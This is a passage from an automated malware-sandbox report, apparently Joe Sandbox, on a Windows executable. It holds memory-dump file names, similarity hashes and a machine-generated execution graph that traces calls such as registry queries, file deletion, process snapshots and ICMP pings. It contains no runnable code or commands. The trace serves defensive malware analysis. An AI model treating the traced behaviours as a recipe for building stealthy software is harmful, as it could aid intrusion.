                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                            Signature Coverage:3.5%
                                                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:61
                                                                                                                                                                                                                                                                                            execution_graph 104244 921033 104249 9268b4 104244->104249 104248 921042 104250 92bf73 8 API calls 104249->104250 104251 926922 104250->104251 104257 92589f 104251->104257 104254 9269bf 104255 921038 104254->104255 104260 926b14 8 API calls __fread_nolock 104254->104260 104256 940413 29 API calls __onexit 104255->104256 104256->104248 104261 9258cb 104257->104261 104260->104254 104262 9258be 104261->104262 104263 9258d8 104261->104263 104262->104254 104263->104262 104264 9258df RegOpenKeyExW 104263->104264 104264->104262 104265 9258f9 RegQueryValueExW 104264->104265 104266 92592f RegCloseKey 104265->104266 104267 92591a 104265->104267 104266->104262 104267->104266 102585 976555 102592 94014b 102585->102592 102587 97655c 102591 976575 __fread_nolock 102587->102591 102601 94017b 102587->102601 102588 94017b 8 API calls 102590 97659a 102588->102590 102591->102588 102593 940150 ___std_exception_copy 102592->102593 102594 94016a 102593->102594 102597 94016c 102593->102597 102610 94521d 7 API calls 2 library calls 102593->102610 102594->102587 102596 9409dd 102612 943614 RaiseException 102596->102612 102597->102596 102611 943614 RaiseException 102597->102611 102600 9409fa 102600->102587 102602 94014b ___std_exception_copy 102601->102602 102603 94016a 102602->102603 102605 94016c 102602->102605 102613 94521d 7 API calls 2 library calls 102602->102613 102603->102591 102609 9409dd 102605->102609 102614 943614 RaiseException 102605->102614 102608 9409fa 102608->102591 102615 943614 RaiseException 102609->102615 102610->102593 102611->102596 102612->102600 102613->102602 102614->102609 102615->102608 102616 975650 102625 93e3d5 102616->102625 102618 975666 102622 9756e1 102618->102622 102634 93aa65 9 API calls 102618->102634 102620 9756c1 102620->102622 102635 99247e 8 API calls 102620->102635 102624 9761d7 102622->102624 102636 993fe1 81 API calls __wsopen_s 102622->102636 102626 93e3e3 102625->102626 102627 93e3f6 102625->102627 102637 92b4c8 102626->102637 102629 93e3fb 102627->102629 102630 93e429 102627->102630 102631 94014b 8 API calls 102629->102631 102632 92b4c8 8 API calls 102630->102632 102633 93e3ed 102631->102633 102632->102633 102633->102618 102634->102620 102635->102622 102636->102624 102638 92b4d6 102637->102638 102640 92b4dc 102637->102640 102638->102640 102641 92bed9 102638->102641 102640->102633 102642 92befc __fread_nolock 102641->102642 102643 92beed 102641->102643 102642->102640 102643->102642 102644 94017b 8 API calls 102643->102644 102644->102642 104268 9236f5 104271 92370f 104268->104271 104272 923726 104271->104272 104273 92378a 104272->104273 104274 92372b 104272->104274 104311 923788 104272->104311 104278 963df4 104273->104278 104279 923790 104273->104279 104275 923804 PostQuitMessage 104274->104275 104276 923738 104274->104276 104303 923709 104275->104303 104280 923743 104276->104280 104281 963e61 104276->104281 104277 92376f DefWindowProcW 104277->104303 104326 922f92 10 API calls 104278->104326 104283 923797 104279->104283 104284 9237bc SetTimer RegisterWindowMessageW 104279->104284 104285 92380e 104280->104285 104286 92374d 104280->104286 104329 98c8f7 65 API calls ___scrt_fastfail 104281->104329 104290 9237a0 KillTimer 104283->104290 104291 963d95 104283->104291 104287 9237e5 CreatePopupMenu 104284->104287 104284->104303 104316 93fcad 104285->104316 104292 963e46 104286->104292 104293 923758 104286->104293 104287->104303 104289 963e15 104327 93f23c 40 API calls 104289->104327 104299 923907 Shell_NotifyIconW 104290->104299 104297 963dd0 MoveWindow 104291->104297 104298 963d9a 104291->104298 104292->104277 104328 981423 8 API calls 104292->104328 104301 9237f2 104293->104301 104302 923763 104293->104302 104294 963e73 104294->104277 104294->104303 104297->104303 104304 963da0 104298->104304 104305 963dbf SetFocus 104298->104305 104300 9237b3 104299->104300 104323 9259ff DeleteObject DestroyWindow 104300->104323 104324 92381f 75 API calls ___scrt_fastfail 104301->104324 104302->104277 104313 923907 Shell_NotifyIconW 104302->104313 104304->104302 104309 963da9 104304->104309 104305->104303 104325 922f92 10 API calls 104309->104325 104311->104277 104312 923802 104312->104303 104314 963e3a 104313->104314 104315 92396b 60 API calls 104314->104315 104315->104311 104317 93fcc5 ___scrt_fastfail 104316->104317 104318 93fd4b 104316->104318 104319 9261a9 55 API calls 104317->104319 104318->104303 104321 93fcec 104319->104321 104320 93fd34 KillTimer SetTimer 104320->104318 104321->104320 104322 97fe2b Shell_NotifyIconW 104321->104322 104322->104320 104323->104303 104324->104312 104325->104303 104326->104289 104327->104302 104328->104311 104329->104294 102645 92105b 102650 9252a7 102645->102650 102647 92106a 102681 940413 29 API calls __onexit 102647->102681 102649 921074 102651 9252b7 __wsopen_s 102650->102651 102682 92bf73 102651->102682 102655 925376 102694 925238 102655->102694 102662 92bf73 8 API calls 102663 9253a7 102662->102663 102715 92bd57 102663->102715 102666 964be6 RegQueryValueExW 102667 964c03 102666->102667 102668 964c7c RegCloseKey 102666->102668 102669 94017b 8 API calls 102667->102669 102671 9253d2 102668->102671 102673 964c8e _wcslen 102668->102673 102670 964c1c 102669->102670 102721 92423c 102670->102721 102671->102647 102673->102671 102677 92655e 8 API calls 102673->102677 102680 926a7c 8 API calls 102673->102680 102736 92b329 102673->102736 102675 964c44 102724 928577 102675->102724 102677->102673 102678 964c5e ISource 102678->102668 102680->102673 102681->102649 102683 94017b 8 API calls 102682->102683 102684 92bf88 102683->102684 102685 94014b 8 API calls 102684->102685 102686 92536d 102685->102686 102687 925594 102686->102687 102742 9622d0 102687->102742 102690 92b329 8 API calls 102691 9255c7 102690->102691 102744 925851 102691->102744 102693 9255d1 102693->102655 102695 9622d0 __wsopen_s 102694->102695 102696 925245 GetFullPathNameW 102695->102696 102697 925267 102696->102697 102698 928577 8 API calls 102697->102698 102699 925285 102698->102699 102700 926b7c 102699->102700 102701 926b93 102700->102701 102702 9657fe 102700->102702 102768 926ba4 102701->102768 102703 94014b 8 API calls 102702->102703 102706 965808 _wcslen 102703->102706 102705 92538f 102709 926a7c 102705->102709 102707 94017b 8 API calls 102706->102707 102708 965841 __fread_nolock 102707->102708 102710 926a8b 102709->102710 102711 926aac __fread_nolock 102709->102711 102713 94017b 8 API calls 102710->102713 102712 94014b 8 API calls 102711->102712 102714 92539e 102712->102714 102713->102711 102714->102662 102716 92bd71 102715->102716 102717 9253b0 RegOpenKeyExW 102715->102717 102718 94014b 8 API calls 102716->102718 102717->102666 102717->102671 102719 92bd7b 102718->102719 102720 94017b 8 API calls 102719->102720 102720->102717 102722 94014b 8 API calls 102721->102722 102723 92424e RegQueryValueExW 102722->102723 102723->102675 102723->102678 102725 928587 _wcslen 102724->102725 102726 966610 102724->102726 102729 9285c2 102725->102729 102730 92859d 102725->102730 102727 92adf4 8 API calls 102726->102727 102728 966619 102727->102728 102728->102728 102731 94014b 8 API calls 102729->102731 102783 9288e8 8 API calls 102730->102783 102733 9285ce 102731->102733 102735 94017b 8 API calls 102733->102735 102734 9285a5 __fread_nolock 102734->102678 102735->102734 102737 92b338 _wcslen 102736->102737 102738 94017b 8 API calls 102737->102738 102739 92b360 __fread_nolock 102738->102739 102740 94014b 8 API calls 102739->102740 102741 92b376 102740->102741 102741->102673 102743 9255a1 GetModuleFileNameW 102742->102743 102743->102690 102745 9622d0 __wsopen_s 102744->102745 102746 92585e GetFullPathNameW 102745->102746 102747 925898 102746->102747 102748 92587d 102746->102748 102750 92bd57 8 API calls 102747->102750 102749 928577 8 API calls 102748->102749 102751 925889 102749->102751 102750->102751 102754 9255dc 102751->102754 102755 9255ea 102754->102755 102758 92adf4 102755->102758 102757 9255fe 102757->102693 102759 92ae02 102758->102759 102761 92ae0b __fread_nolock 102758->102761 102759->102761 102762 92c2c9 102759->102762 102761->102757 102763 92c2d9 __fread_nolock 102762->102763 102764 92c2dc 102762->102764 102763->102761 102765 94014b 8 API calls 102764->102765 102766 92c2e7 102765->102766 102767 94017b 8 API calls 102766->102767 102767->102763 102769 926bb4 _wcslen 102768->102769 102770 926bc7 102769->102770 102771 965860 102769->102771 102778 927d74 102770->102778 102773 94014b 8 API calls 102771->102773 102775 96586a 102773->102775 102774 926bd4 __fread_nolock 102774->102705 102776 94017b 8 API calls 102775->102776 102777 96589a __fread_nolock 102776->102777 102779 927d8a 102778->102779 102782 927d85 __fread_nolock 102778->102782 102780 94017b 8 API calls 102779->102780 102781 966528 102779->102781 102780->102782 102781->102781 102782->102774 102783->102734 102784 921098 102789 925fc8 102784->102789 102788 9210a7 102790 92bf73 8 API calls 102789->102790 102791 925fdf GetVersionExW 102790->102791 102792 928577 8 API calls 102791->102792 102793 92602c 102792->102793 102794 92adf4 8 API calls 102793->102794 102796 926062 102793->102796 102795 926056 102794->102795 102798 9255dc 8 API calls 102795->102798 102797 92611c GetCurrentProcess IsWow64Process 102796->102797 102805 965224 102796->102805 102799 926138 102797->102799 102798->102796 102800 926150 LoadLibraryA 102799->102800 102801 965269 GetSystemInfo 102799->102801 102802 926161 GetProcAddress 102800->102802 102803 92619d GetSystemInfo 102800->102803 102802->102803 102806 926171 GetNativeSystemInfo 102802->102806 102804 926177 102803->102804 102807 92109d 102804->102807 102808 92617b FreeLibrary 102804->102808 102806->102804 102809 940413 29 API calls __onexit 102807->102809 102808->102807 102809->102788 104330 930ebf 104331 930ed3 104330->104331 104337 931425 104330->104337 104332 94014b 8 API calls 104331->104332 104335 930ee5 104331->104335 104332->104335 104333 97562c 104363 991b14 8 API calls 104333->104363 104334 92b4c8 8 API calls 104334->104335 104335->104333 104335->104334 104336 930f3e 104335->104336 104339 932b20 207 API calls 104336->104339 104355 93049d ISource 104336->104355 104337->104335 104340 92bed9 8 API calls 104337->104340 104362 930376 ISource 104339->104362 104340->104335 104341 97632b 104367 993fe1 81 API calls __wsopen_s 104341->104367 104342 931e50 40 API calls 104342->104362 104343 931695 104348 92bed9 8 API calls 104343->104348 104343->104355 104345 975cdb 104352 92bed9 8 API calls 104345->104352 104345->104355 104346 97625a 104366 993fe1 81 API calls __wsopen_s 104346->104366 104347 92bed9 8 API calls 104347->104362 104348->104355 104351 931990 207 API calls 104351->104362 104352->104355 104353 9405b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104353->104362 104354 92bf73 8 API calls 104354->104362 104356 976115 104364 993fe1 81 API calls __wsopen_s 104356->104364 104357 930aae ISource 104365 993fe1 81 API calls __wsopen_s 104357->104365 104358 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104358->104362 104360 940413 29 API calls pre_c_initialization 104360->104362 104361 94014b 8 API calls 104361->104362 104362->104341 104362->104342 104362->104343 104362->104345 104362->104346 104362->104347 104362->104351 104362->104353 104362->104354 104362->104355 104362->104356 104362->104357 104362->104358 104362->104360 104362->104361 104363->104355 104364->104357 104365->104355 104366->104355 104367->104355 102810 92f4dc 102813 92cab0 102810->102813 102814 92cacb 102813->102814 102815 9714be 102814->102815 102816 97150c 102814->102816 102836 92caf0 102814->102836 102819 9714c8 102815->102819 102822 9714d5 102815->102822 102815->102836 102885 9a62ff 207 API calls 2 library calls 102816->102885 102883 9a6790 207 API calls 102819->102883 102835 92cdc0 102822->102835 102884 9a6c2d 207 API calls 2 library calls 102822->102884 102823 93e807 39 API calls 102823->102836 102826 97179f 102826->102826 102828 92cf80 39 API calls 102828->102836 102831 92cdee 102832 9716e8 102887 9a6669 81 API calls 102832->102887 102835->102831 102888 993fe1 81 API calls __wsopen_s 102835->102888 102836->102823 102836->102828 102836->102831 102836->102832 102836->102835 102838 92b4c8 8 API calls 102836->102838 102842 92bed9 8 API calls 102836->102842 102844 930340 102836->102844 102867 92be2d 102836->102867 102871 93e7c1 39 API calls 102836->102871 102872 93aa99 207 API calls 102836->102872 102873 9405b2 5 API calls __Init_thread_wait 102836->102873 102874 93bc58 102836->102874 102879 940413 29 API calls __onexit 102836->102879 102880 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102836->102880 102881 93f4df 81 API calls 102836->102881 102882 93f346 207 API calls 102836->102882 102886 97ffaf 8 API calls 102836->102886 102838->102836 102842->102836 102864 930376 ISource 102844->102864 102845 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102845->102864 102846 97632b 102964 993fe1 81 API calls __wsopen_s 102846->102964 102847 94014b 8 API calls 102847->102864 102849 931695 102853 92bed9 8 API calls 102849->102853 102861 93049d ISource 102849->102861 102851 975cdb 102859 92bed9 8 API calls 102851->102859 102851->102861 102852 97625a 102963 993fe1 81 API calls __wsopen_s 102852->102963 102853->102861 102856 92bed9 8 API calls 102856->102864 102857 9405b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102857->102864 102859->102861 102860 92bf73 8 API calls 102860->102864 102861->102836 102862 940413 29 API calls pre_c_initialization 102862->102864 102863 976115 102961 993fe1 81 API calls __wsopen_s 102863->102961 102864->102845 102864->102846 102864->102847 102864->102849 102864->102851 102864->102852 102864->102856 102864->102857 102864->102860 102864->102861 102864->102862 102864->102863 102866 930aae ISource 102864->102866 102889 931990 102864->102889 102951 931e50 102864->102951 102962 993fe1 81 API calls __wsopen_s 102866->102962 102868 92be38 102867->102868 102869 92be67 102868->102869 103696 92bfa5 102868->103696 102869->102836 102871->102836 102872->102836 102873->102836 102875 94014b 8 API calls 102874->102875 102876 93bc65 102875->102876 102877 92b329 8 API calls 102876->102877 102878 93bc70 102877->102878 102878->102836 102879->102836 102880->102836 102881->102836 102882->102836 102883->102822 102884->102835 102885->102836 102886->102836 102887->102835 102888->102826 102890 9319b6 102889->102890 102891 931a2e 102889->102891 102892 9319c3 102890->102892 102893 976b60 102890->102893 102894 976a4d 102891->102894 102906 931a3d 102891->102906 102902 976b84 102892->102902 102903 9319cd 102892->102903 102971 9a85db 207 API calls 2 library calls 102893->102971 102896 976b54 102894->102896 102897 976a58 102894->102897 102970 993fe1 81 API calls __wsopen_s 102896->102970 102969 93b35c 207 API calls 102897->102969 102898 930340 207 API calls 102898->102906 102901 976bb5 102904 976be2 102901->102904 102905 976bc0 102901->102905 102902->102901 102912 976b9c 102902->102912 102911 92bed9 8 API calls 102903->102911 102935 9319e0 ISource 102903->102935 102974 9a60e6 102904->102974 102973 9a85db 207 API calls 2 library calls 102905->102973 102906->102898 102907 976979 102906->102907 102910 931bb5 102906->102910 102915 976908 102906->102915 102926 931ba9 102906->102926 102906->102935 102936 931af4 102906->102936 102968 993fe1 81 API calls __wsopen_s 102907->102968 102910->102864 102911->102935 102972 993fe1 81 API calls __wsopen_s 102912->102972 102913 976dd9 102921 976e0f 102913->102921 103073 9a81ce 65 API calls 102913->103073 102967 993fe1 81 API calls __wsopen_s 102915->102967 102919 976c81 103047 991ad8 8 API calls 102919->103047 102925 92b4c8 8 API calls 102921->102925 102922 92bed9 8 API calls 102922->102935 102923 976db7 103050 928ec0 102923->103050 102950 931a23 ISource 102925->102950 102926->102910 102966 993fe1 81 API calls __wsopen_s 102926->102966 102928 976ded 102931 928ec0 52 API calls 102928->102931 102930 976c08 102981 99148b 102930->102981 102947 976df5 _wcslen 102931->102947 102933 976c93 103048 92bd07 8 API calls 102933->103048 102934 97691d ISource 102934->102907 102946 931b62 ISource 102934->102946 102934->102950 102935->102913 102935->102950 103049 9a808f 53 API calls __wsopen_s 102935->103049 102936->102926 102965 931ca0 8 API calls 102936->102965 102940 931b55 102940->102926 102940->102946 102941 976c9c 102949 99148b 8 API calls 102941->102949 102942 976dbf _wcslen 102942->102913 102944 92b4c8 8 API calls 102942->102944 102944->102913 102946->102922 102946->102935 102946->102950 102947->102921 102948 92b4c8 8 API calls 102947->102948 102948->102921 102949->102935 102950->102864 102952 931e6d ISource 102951->102952 102953 931ff7 ISource 102952->102953 102954 932512 102952->102954 102957 977837 102952->102957 102960 97766b 102952->102960 103693 93e322 8 API calls ISource 102952->103693 102953->102864 102954->102953 103695 93be08 39 API calls 102954->103695 102957->102953 103694 94d2d5 39 API calls 102957->103694 103692 94d2d5 39 API calls 102960->103692 102961->102866 102962->102861 102963->102861 102964->102861 102965->102940 102966->102950 102967->102934 102968->102935 102969->102946 102970->102893 102971->102935 102972->102950 102973->102935 102975 976bed 102974->102975 102976 9a6101 102974->102976 102975->102919 102975->102930 102977 94017b 8 API calls 102976->102977 102979 9a6123 102977->102979 102978 94014b 8 API calls 102978->102979 102979->102975 102979->102978 103074 991400 8 API calls 102979->103074 102982 976c32 102981->102982 102983 991499 102981->102983 102985 932b20 102982->102985 102983->102982 102984 94014b 8 API calls 102983->102984 102984->102982 102986 932b61 102985->102986 102987 932fc0 102986->102987 102988 932b86 102986->102988 103220 9405b2 5 API calls __Init_thread_wait 102987->103220 102990 932ba0 102988->102990 102991 977bd8 102988->102991 103075 933160 102990->103075 103183 9a7af9 102991->103183 102992 932fca 102997 92b329 8 API calls 102992->102997 103003 93300b 102992->103003 102995 977be4 102995->102935 103007 932fe4 102997->103007 102998 933160 9 API calls 102999 932bc6 102998->102999 103000 932bfc 102999->103000 102999->103003 103002 977bfd 103000->103002 103027 932c18 __fread_nolock 103000->103027 103001 977bed 103001->102935 103224 993fe1 81 API calls __wsopen_s 103002->103224 103003->103001 103004 92b4c8 8 API calls 103003->103004 103006 933049 103004->103006 103222 93e6e8 207 API calls 103006->103222 103221 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103007->103221 103010 977c15 103225 993fe1 81 API calls __wsopen_s 103010->103225 103012 932d3f 103013 977c78 103012->103013 103014 932d4c 103012->103014 103227 9a61a2 53 API calls _wcslen 103013->103227 103015 933160 9 API calls 103014->103015 103017 932d59 103015->103017 103021 933160 9 API calls 103017->103021 103028 932dd7 ISource 103017->103028 103018 94014b 8 API calls 103018->103027 103019 94017b 8 API calls 103019->103027 103020 933082 103223 93fe39 8 API calls 103020->103223 103032 932d73 103021->103032 103023 932f2d 103023->102935 103024 9330bd 103024->102935 103026 930340 207 API calls 103026->103027 103027->103006 103027->103010 103027->103012 103027->103018 103027->103019 103027->103026 103027->103028 103029 977c59 103027->103029 103028->103020 103030 933160 9 API calls 103028->103030 103034 932e8b ISource 103028->103034 103085 99664c 103028->103085 103092 99f94a 103028->103092 103101 9a9fe8 103028->103101 103104 9a9ffc 103028->103104 103107 9aa9ac 103028->103107 103115 9aad47 103028->103115 103120 9aa6aa 103028->103120 103128 9aa5b2 103028->103128 103134 99df45 103028->103134 103139 93ac3e 103028->103139 103158 9a0fb8 103028->103158 103228 993fe1 81 API calls __wsopen_s 103028->103228 103226 993fe1 81 API calls __wsopen_s 103029->103226 103030->103028 103032->103028 103035 92bed9 8 API calls 103032->103035 103034->103023 103219 93e322 8 API calls ISource 103034->103219 103035->103028 103047->102933 103048->102941 103049->102923 103051 928ed5 103050->103051 103067 928ed2 103050->103067 103052 928f0b 103051->103052 103053 928edd 103051->103053 103057 928f1d 103052->103057 103062 966a38 103052->103062 103063 966b1f 103052->103063 103688 945536 26 API calls 103053->103688 103055 928eed 103061 94014b 8 API calls 103055->103061 103689 93fe6f 51 API calls 103057->103689 103058 966b37 103058->103058 103064 928ef7 103061->103064 103066 94017b 8 API calls 103062->103066 103072 966ab1 103062->103072 103691 9454f3 26 API calls 103063->103691 103065 92b329 8 API calls 103064->103065 103065->103067 103068 966a81 103066->103068 103067->102942 103069 94014b 8 API calls 103068->103069 103070 966aa8 103069->103070 103071 92b329 8 API calls 103070->103071 103071->103072 103690 93fe6f 51 API calls 103072->103690 103073->102928 103074->102979 103076 9331a1 103075->103076 103081 93317d 103075->103081 103229 9405b2 5 API calls __Init_thread_wait 103076->103229 103079 9331ab 103079->103081 103230 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103079->103230 103080 939f47 103084 932bb0 103080->103084 103232 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103080->103232 103081->103084 103231 9405b2 5 API calls __Init_thread_wait 103081->103231 103084->102998 103086 928ec0 52 API calls 103085->103086 103087 996662 103086->103087 103233 98dc54 103087->103233 103089 99666a 103090 99666e GetLastError 103089->103090 103091 996683 103089->103091 103090->103091 103091->103028 103093 94017b 8 API calls 103092->103093 103094 99f95b 103093->103094 103095 92423c 8 API calls 103094->103095 103096 99f965 103095->103096 103097 928ec0 52 API calls 103096->103097 103098 99f97c GetEnvironmentVariableW 103097->103098 103338 99160f 8 API calls 103098->103338 103100 99f999 ISource 103100->103028 103339 9a89b6 103101->103339 103103 9a9ff8 103103->103028 103105 9a89b6 119 API calls 103104->103105 103106 9aa00c 103105->103106 103106->103028 103108 9aa9c8 103107->103108 103110 9aaa08 103107->103110 103108->103028 103109 9aaa26 103109->103108 103111 9aaa8e 103109->103111 103484 92c98d 39 API calls 103109->103484 103110->103109 103483 92c98d 39 API calls 103110->103483 103451 990372 103111->103451 103116 928ec0 52 API calls 103115->103116 103117 9aad63 103116->103117 103525 98dd87 CreateToolhelp32Snapshot Process32FirstW 103117->103525 103119 9aad72 103119->103028 103121 9aa705 103120->103121 103126 9aa6c5 103120->103126 103122 9aa723 103121->103122 103544 92c98d 39 API calls 103121->103544 103125 9aa780 103122->103125 103122->103126 103545 92c98d 39 API calls 103122->103545 103127 990372 58 API calls 103125->103127 103126->103028 103127->103126 103130 9aa5c5 103128->103130 103129 928ec0 52 API calls 103131 9aa632 103129->103131 103130->103129 103133 9aa5d4 103130->103133 103546 9918a9 103131->103546 103133->103028 103135 92b4c8 8 API calls 103134->103135 103136 99df58 103135->103136 103587 991926 103136->103587 103138 99df60 103138->103028 103140 928ec0 52 API calls 103139->103140 103141 93ac68 103140->103141 103142 93bc58 8 API calls 103141->103142 103143 93ac7f 103142->103143 103154 93b09b _wcslen 103143->103154 103631 92c98d 39 API calls 103143->103631 103145 93bbbe 43 API calls 103145->103154 103146 944d98 _strftime 40 API calls 103146->103154 103150 926c03 8 API calls 103150->103154 103151 93b1fb 103151->103028 103152 92c98d 39 API calls 103152->103154 103153 928ec0 52 API calls 103153->103154 103154->103145 103154->103146 103154->103150 103154->103151 103154->103152 103154->103153 103155 928577 8 API calls 103154->103155 103617 92396b 103154->103617 103627 923907 103154->103627 103632 927ad5 103154->103632 103637 92ad40 8 API calls __fread_nolock 103154->103637 103638 927b1a 8 API calls 103154->103638 103155->103154 103159 9a0fe1 103158->103159 103160 9a100f WSAStartup 103159->103160 103681 92c98d 39 API calls 103159->103681 103161 9a1023 ISource 103160->103161 103162 9a1054 103160->103162 103161->103028 103676 93c1f6 103162->103676 103165 9a0ffc 103165->103160 103682 92c98d 39 API calls 103165->103682 103167 928ec0 52 API calls 103169 9a1069 103167->103169 103171 93f9d4 10 API calls 103169->103171 103170 9a100b 103170->103160 103172 9a1075 inet_addr gethostbyname 103171->103172 103172->103161 103173 9a1093 IcmpCreateFile 103172->103173 103173->103161 103174 9a10d3 103173->103174 103175 94017b 8 API calls 103174->103175 103176 9a10ec 103175->103176 103177 92423c 8 API calls 103176->103177 103178 9a10f7 103177->103178 103179 9a112b IcmpSendEcho 103178->103179 103180 9a1102 IcmpSendEcho 103178->103180 103182 9a114c 103179->103182 103180->103182 103181 9a1212 IcmpCloseHandle WSACleanup 103181->103161 103182->103181 103184 9a7b38 103183->103184 103185 9a7b52 103183->103185 103683 993fe1 81 API calls __wsopen_s 103184->103683 103186 9a60e6 8 API calls 103185->103186 103188 9a7b5d 103186->103188 103189 930340 206 API calls 103188->103189 103190 9a7bc1 103189->103190 103191 9a7c5c 103190->103191 103195 9a7c03 103190->103195 103218 9a7b4a 103190->103218 103192 9a7c62 103191->103192 103193 9a7cb0 103191->103193 103684 991ad8 8 API calls 103192->103684 103194 928ec0 52 API calls 103193->103194 103193->103218 103196 9a7cc2 103194->103196 103200 99148b 8 API calls 103195->103200 103198 92c2c9 8 API calls 103196->103198 103201 9a7ce6 CharUpperBuffW 103198->103201 103199 9a7c85 103685 92bd07 8 API calls 103199->103685 103203 9a7c3b 103200->103203 103205 9a7d00 103201->103205 103204 932b20 206 API calls 103203->103204 103204->103218 103206 9a7d53 103205->103206 103207 9a7d07 103205->103207 103208 928ec0 52 API calls 103206->103208 103211 99148b 8 API calls 103207->103211 103209 9a7d5b 103208->103209 103686 93aa65 9 API calls 103209->103686 103212 9a7d35 103211->103212 103213 932b20 206 API calls 103212->103213 103213->103218 103214 9a7d65 103215 928ec0 52 API calls 103214->103215 103214->103218 103216 9a7d80 103215->103216 103687 92bd07 8 API calls 103216->103687 103218->102995 103219->103034 103220->102992 103221->103003 103222->103020 103223->103024 103224->103028 103225->103028 103226->103028 103227->103032 103228->103028 103229->103079 103230->103081 103231->103080 103232->103084 103234 92bf73 8 API calls 103233->103234 103235 98dc73 103234->103235 103236 92bf73 8 API calls 103235->103236 103237 98dc7c 103236->103237 103238 92bf73 8 API calls 103237->103238 103239 98dc85 103238->103239 103240 925851 9 API calls 103239->103240 103241 98dc90 103240->103241 103257 98eab0 GetFileAttributesW 103241->103257 103244 98dcab 103259 92568e 103244->103259 103246 926b7c 8 API calls 103246->103244 103247 98dcbf FindFirstFileW 103248 98dd4b FindClose 103247->103248 103253 98dcde 103247->103253 103249 98dd56 103248->103249 103249->103089 103250 98dd26 FindNextFileW 103250->103253 103251 92bed9 8 API calls 103251->103253 103253->103248 103253->103250 103253->103251 103254 926b7c 8 API calls 103253->103254 103301 927bb5 103253->103301 103255 98dd17 DeleteFileW 103254->103255 103255->103250 103256 98dd42 FindClose 103255->103256 103256->103249 103258 98dc99 103257->103258 103258->103244 103258->103246 103260 92bf73 8 API calls 103259->103260 103261 9256a4 103260->103261 103262 92bf73 8 API calls 103261->103262 103263 9256ac 103262->103263 103264 92bf73 8 API calls 103263->103264 103265 9256b4 103264->103265 103266 92bf73 8 API calls 103265->103266 103267 9256bc 103266->103267 103268 9256f0 103267->103268 103269 964da1 103267->103269 103271 92acc0 8 API calls 103268->103271 103270 92bed9 8 API calls 103269->103270 103272 964daa 103270->103272 103273 9256fe 103271->103273 103274 92bd57 8 API calls 103272->103274 103275 92adf4 8 API calls 103273->103275 103277 925733 103274->103277 103276 925708 103275->103276 103276->103277 103278 92acc0 8 API calls 103276->103278 103279 925754 103277->103279 103293 925778 103277->103293 103300 964dcc 103277->103300 103281 925729 103278->103281 103279->103293 103322 92655e 103279->103322 103282 92adf4 8 API calls 103281->103282 103282->103277 103283 925789 103287 92bed9 8 API calls 103283->103287 103288 92579f 103283->103288 103286 928577 8 API calls 103297 964e8c 103286->103297 103287->103288 103290 9257b3 103288->103290 103291 92bed9 8 API calls 103288->103291 103289 9257be 103295 92bed9 8 API calls 103289->103295 103298 9257c9 103289->103298 103290->103289 103294 92bed9 8 API calls 103290->103294 103291->103290 103292 92acc0 8 API calls 103292->103293 103310 92acc0 103293->103310 103294->103289 103295->103298 103296 92655e 8 API calls 103296->103297 103297->103293 103297->103296 103325 92ad40 8 API calls __fread_nolock 103297->103325 103298->103247 103300->103286 103302 927bc7 103301->103302 103303 96641d 103301->103303 103327 927bd8 103302->103327 103337 9813c8 8 API calls __fread_nolock 103303->103337 103306 927bd3 103306->103253 103307 966427 103308 92bed9 8 API calls 103307->103308 103309 966433 103307->103309 103308->103309 103311 92ace1 103310->103311 103321 92accf 103310->103321 103315 970557 103311->103315 103316 92ad07 103311->103316 103311->103321 103312 92acda __fread_nolock 103312->103283 103313 92c2c9 8 API calls 103314 9705a3 __fread_nolock 103313->103314 103318 94014b 8 API calls 103315->103318 103326 9288e8 8 API calls 103316->103326 103319 970561 103318->103319 103320 94017b 8 API calls 103319->103320 